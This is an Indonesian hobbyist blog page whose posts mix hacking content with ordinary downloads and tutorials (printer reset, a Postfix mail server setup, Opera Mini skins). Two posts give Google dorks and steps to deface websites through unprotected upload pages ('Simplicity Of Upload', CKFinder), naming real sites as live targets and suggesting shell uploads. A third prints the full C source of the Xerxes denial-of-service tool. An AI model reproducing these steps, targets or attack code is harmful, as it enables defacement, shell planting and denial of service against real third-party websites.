Sunday, January 8, 2012

[POC] Vulnerability Simplicity Of Upload

Sudah lama gak posting di sini, kali ini masih seputar DEFACE WEBSITE aja lah :D hehe.

Sesuai judul di atas, mari kita bahas bersama aja :)
Simplycity Of Upload, terdengar sangat hebat bukan ? haha.

Mendapatkan ini selal tidak sengaja, karena saya hanya memakai dork yang lumanyun.
#Step 1:
Dork: “Powered By: © Simplicity oF Upload”
#Step 2:
Exploit: http://[situstargetkamu]/PATH/upload.php
*Tergantung dengan target.
#Step 3:
Allowed file: gif, jpg, png, txt, php, asp, cgi, zip, exe, mp3, etc (not allowed for html)
#Step 4:
Preview: http://[situstargetkamu]/upload/[Your File]
#Step 5: Live Demo:
http://www.railfaneurope.net/pix/upload.php
http://www.formplas.com/upload/upload.php
*Di google masih banyak kok :D
Nah, saya kira cukup segitu aja kok, karena mudah tuh tutorial nya.
Kalau masih ada yang bingung ? komen aja, nanti langsung saya bales :)
Keep spirit brothers.
Home: http://www.fikrifakhrezy.com/
FB: https://www.facebook.com/fikri.badboy
Twitter: https://www.twitter.com/fikri_badboy
Sekian dulu ya, semoga berhasil semua :D
Wassalamualaikum..
»»  READMORE...

DDOS Tools: Xerxes DOS Tools

Berikut ini adalah source code Xerxes DOS (DDOS Tools) yang digunakan untuk melakukan DOS terhadap server-server. Digunakan oleh The Jester untuk takedown situs-situs, langsung aja ini source codenya:
/* XerXes – Most powerful dos tool – THN (http://pastebin.com/aWZMbjSU) */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int make_socket(char *host, char *port) {
    struct addrinfo hints, *servinfo, *p;
    int sock, r;
//    fprintf(stderr, “[Connecting -> %s:%s\n", host, port);
    memset(&hints, 0, sizeof(hints));
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;
    if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
        fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r));
        exit(0);
    }
    for(p = servinfo; p != NULL; p = p->ai_next) {
        if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
            continue;
        }
        if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
            close(sock);
            continue;
        }
        break;
    }
    if(p == NULL) {
        if(servinfo)
            freeaddrinfo(servinfo);
        fprintf(stderr, "No connection could be made\n");
        exit(0);
    }
    if(servinfo)
        freeaddrinfo(servinfo);
    fprintf(stderr, "[Connected -> %s:%s]\n”, host, port);
    return sock;
}
void broke(int s) {
    // do nothing
}
#define CONNECTIONS 8
#define THREADS 48
void attack(char *host, char *port, int id) {
    int sockets[CONNECTIONS];
    int x, g=1, r;
    for(x=0; x!= CONNECTIONS; x++)
        sockets[x]=0;
    signal(SIGPIPE, &broke);
    while(1) {
        for(x=0; x != CONNECTIONS; x++) {
            if(sockets[x] == 0)
                sockets[x] = make_socket(host, port);
            r=write(sockets[x], “\0″, 1);
            if(r == -1) {
                close(sockets[x]);
                sockets[x] = make_socket(host, port);
            } else
//                fprintf(stderr, “Socket[%i->%i] -> %i\n”, x, sockets[x], r);
            fprintf(stderr, “[%i: Voly Sent]\n”, id);
        }
        fprintf(stderr, “[%i: Voly Sent]\n”, id);
        usleep(300000);
    }
}
void cycle_identity() {
    int r;
    int socket = make_socket(“localhost”, “9050″);
    write(socket, “AUTHENTICATE \”\”\n”, 16);
    while(1) {
        r=write(socket, “signal NEWNYM\n\x00″, 16);
        fprintf(stderr, “[%i: cycle_identity -> signal NEWNYM\n", r);
        usleep(300000);
    }
}
int main(int argc, char **argv) {
    int x;
    if(argc !=3)
        cycle_identity();
    for(x=0; x != THREADS; x++) {
        if(fork())
            attack(argv[1], argv[2], x);
        usleep(200000);
    }
    getc(stdin);
    return 0;
}

Semoga informasi ini bermanfaat sebagai pembelajaran yang lebih baik.
»»  READMORE...

Hacking Tools 2012 – Cracking Tools 2012

Berikut ini adalah Download Hacking Tools 2012, Hacking Tools 2012, Tools Hacking 2012, Cracking Tools 2012, Tools Cracking 2012, Tool Hack 2012, Tool Crack 2012, Tool Hacking 2012, Tool Cracking 2012, Tool Hacker 2012, Tool Cracker 2012, Tools Hacker 2012, Tools Cracker 2012 yang mungkin bisa bermanfaat untuk bisa anda pakai di 2012. Happy Hacking All:
Hacking Tools 2012 - Cracking Tools 2012
Ayo Download Hacking Tools 2012 – Hacker Tools 2012 – Hack Tool 2012 – Hacker Tool 2012 – – Hacking Tool 2012 – Hack Tool 2012 – Cracking Tools 2012 – Cracker Tools 2012 – Cracking Tool 2012 – Cracker Tool 2012 – Crack Tools 2012 – Crack Tool 2012..
1. MySQL Password Auditor: Tools untuk melakukan audit / melakukan recovery password di MYSQL:
My Sql Password Auditor
Download MySQL Password Auditor
2. Mole SQL Injection: Tool yang biasa digunakan untuk melakukan SQL Injection di website, sangat mudah dan nyaman.
Mole SQL Injection
Mole Untuk Windows & Mole Untuk Linux
3. X-SCAN: Tools ini digunakan untuk melakukan pengecekan vulnerability terhadap network.
XScan Tools By XFocus
Download X-SCAN
4. SQLSUS SQL Injection: Ini adalah tools untuk melakukan SQL Injection juga, di buat dengan bahasa perl, jadi harus install perl untuk bisa menggunakan tools ini.
SQL Sus
DOWNLOAD SQLSUS
5. W3AF Web Application Attack and Audit Framework: Merupakan tool untuk melakukan attack dan audit terhadap aplikasi website, tool ini sangat populer saat ini.
W3AF Tools
DOWNLOAD W3AF
6. DIR BUSTER: Merupakan tools untuk mencari nama directory dan nama file yang ada di website, tools ini sangat bermanfaat untuk mengetahui informasi halaman apa saja yang ada di website target.
Directory Buster DirBuster OWASP
DOWNLOAD DIR BUSTER LINUX & DOWNLOAD DIR BUSTER WINDOWS
7. WINAUTOPWN: Merupakan sebuah tools yang digunakan untuk mengexploitasi secara langsung Windows Framework, sehingga secara otomatis kita yang akan menjadi administrator di windows tersebut. Banyak digunakan oleh “Defacer” Indonesia untuk melakukan deface terhadap Windows Server :)
Windows Auto PWN
DOWNLOAD WINAUTOPWN MIRROR 1 atau WINDOWS AUTOPWN MIRROR 2
8. Multi Thread TCP Port Scanner: Tools untuk melakukan scanning port yang sedang digunakan dengan multi threading, sehingga bisa berbagai IP & Port yang bisa anda check.
Multi Threader Sync TCP Port Scanner
DOWNLOAD MT-TCP-SCAN
9. NetworkMiner: Merupakan tools untuk melakukan analysis network forensik untuk Windows, banyak di gunakan untuk mengawasi lalu lintas network.
Network Miner
DOWNLOAD NETWORK MINER
10. RAR Password Cracker: Kebanyakan digunakan untuk melakukan crack terhadap RAR yang di password.
Rar Password Cracker
DOWNLOAD RAR PASSWORD CRACKER
Semoga bermanfaat all..
»»  READMORE...

Cara Deface Melalui CKFinder

Assalamualaikum :D
Yuhuu, masih bersama saya lagi nih hehe.
Kalo sama saya, pasti bahas tentang deface lagi :D
Yapz, kali ini main exploit lagi aja ya.
Okay mari kita bahas bersama :)
Dork:
- intitle:index of? inurl:CKfinder/ckfinder.html
Pilih target sesuka kamu.
Nanti ada gambar seperti di bawah ini :D

Setelah itu ? upload deh file kamu.
Tapi ekstensi ny msh txt :’(
Coba aj yang lain ? mungkin bisa upload shell.
Preview
http://situstargetnya/ckfinder/userfiles/files/your file or think it :P
Live target:
- http://e4.escriba.com.br/ckfinder/ckfinder.html
- http://ozoda.net/ckfinder/ckfinder.html
- http://www.dobler-metallbau.com/ckfinder/ckfinder.html
Okay Good Luck all ^_^
Greetz: Tria Wulandari | Palembang Hacker Link | Binus Hacker | Bl4nkc0de | AaEzha | Ichito Bandito | Kingdragrace | Chankunray | Canon | Blue | Marwanz | Dll haha
Wassalamualaikum :D
»»  READMORE...

Hacker Tools: Zed Attack Proxy

Zed Attack Proxy (ZAP) adalah alat penetrasi testing terpadu untuk menemukan kerentanan dalam aplikasi web.
Hal ini dirancang untuk digunakan oleh orang-orang dengan berbagai pengalaman keamanan dan dengan demikian sangat ideal untuk para pengembang dan pentester yang baru untuk melakukan kegiatan pentest.
ZAP menyediakan scanner otomatis serta satu set alat yang memungkinkan untuk menemukan kerentanan keamanan website secara manual.

Fitur-fitur yang ada di ZAP:

Karasteristik ZAP:
  • Easy to install (just requires java 1.6)
  • Ease of use a priority
  • Comprehensive help pages
  • Fully internationalized
  • Under active development
  • Open source
  • Free (no paid for ‘Pro’ version)
  • Cross platform
  • Involvement actively encouraged
Selengkapnya: https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project#tab=Main
»»  READMORE...

Cara Reset Printer EPSON T11

Ada beberapa jenis printer yang sering mengalami blinking adalah printer yang bermerk epson dan canon, untuk epson seperti tipe T10, T11, T20, C41, C45, C90 untuk printer canon misalnya IP100, IP1600, atau seri IP lainnya. Untuk kali ini akan saya bahas adalah cara reset printer sendiri untuk tipe epson t10 dan t11 yang biasanya tipe ini sudah di modifikasi dengan menggunakan tinta infus. kelebihan dan kekurangan printer infus dan tidan infus akan saya bahas nanti. Oke langsung saya ikuti langkah-langkahnya cara reset printer epson t10 dan t11.
  1. Ekstrak File Menggunakan Winzip, 7Zip atau Winrar
  2. Double Klik Loader.exe (Ingat!! Jangan klik AdjProg.exe)
  3. Klik Accept
  4. Klik Select Untuk memilih Jenis printer.
  5. Klik Particular adjustment Mode
  6. Cari Tulisan Waste Ink pad Counter
  7. Klik OK
  8. Klik Check untuk mengecek Main pad Counter
  9. Klik Initialization
  10. Matikan Printer jika di minta.
  11. Nyalakan kembali
  12. Klik Finish
Selamat Mencoba!
»»  READMORE...

Membuat Mail Server + Virtual Domain di Ubuntu

1. Persiapan sistem untuk Ubuntu 9.10Agar nantinya tidak terdapat broken system alangkah baek nya install ubuntu dengan build essential
sudo apt-get install build-essential

2. Install file utama

sudo apt-get install postfix postfix-msql php5-imap dovecot-pop3d dovecot-imapd
php5-mysql squirrelmail apache2

3. Cek system apakah apache2 postfix dan dovecot ny udah ada lum disystem

service apache2 status && service postfix status && service dovecot status

4. Buat Database Untuk Postfix

  root@kaitokid:~# mysql -u root -p     // -p masukkan passwd mysql nya
  mysql> create database postfix; mysql> grant all privileges on postfix.* to 'postfix'@'localhost' identified by 'postfixpassword'; mysql> grant all privileges on postfix.* to 'postfix'@'127.0.0.1' identified by 'postfixpassword'; mysql> exit
  // ganti 'postfixpasswd' sesuai pasword yang di inginkan & 'postfix'
sesuai dengan user yang dinginkan

5. Download postfixadmin untuk mempermudah administrasi mail

 http://sourceforge.net/projects/postfixadmin/

6. Extract hasil download postfixadmin dan pindahkan ke /var/www

 root@kaitokid:~# cd /var/www/ root@kaitokid:/var/www# tar xzf /home/kaitokid/postfixadmin-2.**.tar.gz root@kaitokid:/var/www# mv postfixadmin-2.**/ postfix root@kaitokid:/var/www# chown -R www-data.www-data /var/www

7. Setup config.inc.php postfixadmin

root@kaitokid:~# nano /var/www/postfix/config.inc.php
   // Database Config
// mysql = MySQL 3.23 and 4.0
// mysqli = MySQL 4.1
// pgsql = PostgreSQL
$CONF['database_type'] = 'mysqli'; //sesuaikan dg sql nya untuk mysql seri 4 keatas gunakan mysqli
$CONF['database_host'] = 'localhost';
$CONF['database_user'] = 'postfix'; // user database di mysql lihat nomer 4
$CONF['database_password'] = 'postfixpassword'; // user database mysql lihat nomer 4
$CONF['database_name'] = 'postfix'; $CONF['database_prefix'] = ''; //default kosong

8. Setup postfix admin

buka web browser firefox kemudian buka URL
http://127.0.0.1/postfix/setup.php
// waktu instalasi pastikan tidak ada error & untuk ppostfixadmin series 2.3 file setup tidak perlu dihapus
//pastikan web server di komputer udah jalan

9. Konfigurasi MySQL postfix

//konfigurasi user & passwd sesuai dg nomer 4
nano /etc/postfix/mysql_virtual_alias_maps.cf
user = postfix
password = postfixpassword
hosts = 127.0.0.1
dbname = postfix
table = alias
select_field = goto
where_field = address
nano /etc/postfix/mysql_virtual_mailbox_maps.cf
user = postfix
password = postfixpassword
hosts = 127.0.0.1
dbname = postfix
table = mailbox
select_field = maildir
where_field = username
#additional_conditions = and active = '1'
nano /etc/postfix/mysql_virtual_mailbox_limit_maps.cf
user = postfix
password = postfixpassword
hosts = 127.0.0.1
dbname = postfix
table = mailbox
select_field = quota
where_field = username
#additional_conditions = and active = '1'

nano /etc/postfix/mysql_virtual_domains_maps.cf
user = postfix
password = postfixpassword
hosts = 127.0.0.1
dbname = postfix
table = domain
select_field = domain
where_field = domain
#additional_conditions = and backupmx = '0' and active = '1'

nano /etc/postfix/mysql_relay_domains_maps.cf
user = postfix
password = postfixpassword
hosts = 127.0.0.1
dbname = postfix
table = domain
select_field = domain
where_field = domain
#additional_conditions = and backupmx = '1'
  chgrp postfix /etc/postfix/mysql_*.cf
chmod 640 /etc/postfix/mysql_*.cf
groupadd -g 5000 vmail
useradd -m -g vmail -u 5000 -d /home/vmail -s /bin/bash vmail

10. konfigurasi postfix main.cf

   nano /etc/postfix/main.cf
# Virtual Mailbox Domain Settings
//konfigurasi default main.cf untuk opreknya tunggu di part 2 mail server

myhostname = ubuntu //sesuaikan dg hostname komputer yang dipakai mail server
virtual_alias_maps = mysql:/etc/postfix/mysql_virtual_alias_maps.cf
virtual_mailbox_domains = mysql:/etc/postfix/mysql_virtual_domains_maps.cf
virtual_mailbox_maps = mysql:/etc/postfix/mysql_virtual_mailbox_maps.cf
virtual_mailbox_limit = 51200000
virtual_uid_maps = static:5000
virtual_gid_maps = static:5000
virtual_mailbox_base = /home/vmail
virtual_transport = virtual

# Additional for quota support
virtual_create_maildirsize = yes
virtual_mailbox_extended = yes
virtual_mailbox_limit_maps = mysql:/etc/postfix/mysql_virtual_mailbox_limit_maps.cf
virtual_mailbox_limit_override = yes
virtual_maildir_limit_message = Sorry, the your maildir has overdrawn your diskspace
quota, please free up some of spaces of your mailbox try again.
virtual_overquota_bounce = yes
alias_maps = hash:/etc/aliases
alias_database = hash:/etc/aliases
mydestination =
relayhost =
mynetworks = 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128
mailbox_size_limit = 0
recipient_delimiter = +
inet_interfaces = all
11. Konfigurasi Dovecot POP3 dan IMAP4
nano /etc/dovecot/dovecot.conf
protocols = imap pop3
disable_plaintext_auth = no
default_mail_env = maildir:/home/vmail/%u/
first_valid_uid = 5000
first_valid_gid = 5000
# SQL database
passdb sql {
# Path for SQL configuration file
args = /etc/dovecot/dovecot-sql.conf
}
# SQL database
userdb sql {
# Path for SQL configuration file
args = /etc/dovecot/dovecot-sql.conf
}
nano /etc/dovecot/dovecot-sql.conf
driver = mysql
connect = host=127.0.0.1 dbname=postfix user=postfix password=postfixpassword
default_pass_scheme = CRYPT
user_query = SELECT maildir, 5000 AS uid, 5000 AS gid FROM mailbox WHERE username = '%u'
password_query = SELECT password FROM mailbox WHERE username = '%u'
»»  READMORE...

Skin Opera Mini 6.1 Liverpool & Barcelona | Opera Mini 6.5.sis Skin Barcelona Vs Real Madrid

Silahkan Di pilih....
Masukan file ke Opera Mini yang mau di ganti skin nya...
Good Luck...




Dan ini Opera Mini Modif Skin Barcelona Vs Real Madrid

»»  READMORE...

Opera Mini 6.5 S60v3 Unsigned Skin Spongebob & One Piece S60v3

SpongeBob SquarePants adalah sebuah serial film animasi yang paling populer diNickelodeon. Pada awalnya serial kartun ini ditayangkan pada tahun 1999 di Amerika Serikat dan dicipta oleh Stephen Hillenburg, seorang animator dan ahli biologi laut, dan diterbitkan oleh perusahaan beliau, United Plankton Pictures Inc. Seri kartun ini ditayangkan di Malaysia menerusi saluran Nickelodeon dan TV3, dan juga melalui saluran TV9 yang telah diterjemahkan ke dalam bahasa Melayu.
Ini Opera Mini khusus pecinta Spongebob ^_^
Monggo,







One Piece (ワンピース wanpÄ«su) adalah sebuah anime dan manga tentang sekelompok bajak laut yang dipimpin oleh Monkey D. Luffy yang pergi mencari harta karun legendaris bernamaOne Piece.
Dan ini buat yang suka One Piece
Screenshot :








»»  READMORE...

Bberapa Tolls Gratisan Via PC



Proxifier 2.9 full - Download
Ultra surf 10.17 - Download
Bitvise Tunnelier - Download
ISPCE 2.2.10 - Download
MDMA (Mobile Data Monitoring Application) - Download
StayAlive - Download
Your Freedom - Download
PacketiX VPN - Download

Bonus :
Wireless Tools
K-Mac
NetCut

Windows Tools 
Gammu
Gammu For Windows
Hacker
Craagle 3.0
Tools*
File Partitioner

»»  READMORE...

KolaySoft INBOX v1.0 s60v3 s60v5 SymbianOS x9



KolaySoft INBOX v1.0 adalah aplikasi Shortcut inbox untuk mempermudah kita untuk membuka inbox atau dengan kata lain aplikasi jalan pintas menuju inbox.
Cukup kalian letakan pada shortcut home screen agar lebih mudah saat membuka inbox.


KolaySoft INBOX v1.0.sis
[Download]

»»  READMORE...

WinRAR - Mengekstrak Arsip ZIP Dan RAR (Multi screen)

winrar
WinRAR, adalah aplikasi untuk mengekstrak sebuah file yang telah dikemas dalam arsip agar kita dapat menginstal aplikasi yang ada didalamnya, aplikasi ini tida hanya membaca file RAR namun Juga dapat membaca file ZIP.
Kita dapat mengekstrak file dari arsip yang ada, ataupun membuat arsip baru (rar & zip).
Aplikasi ini terbilang ramah lingkungan, karena sudah mendukung semua jenis Handphone termasuk java.






WinRAR.jar
[Download]
WinRAR.zip
[Download]

»»  READMORE...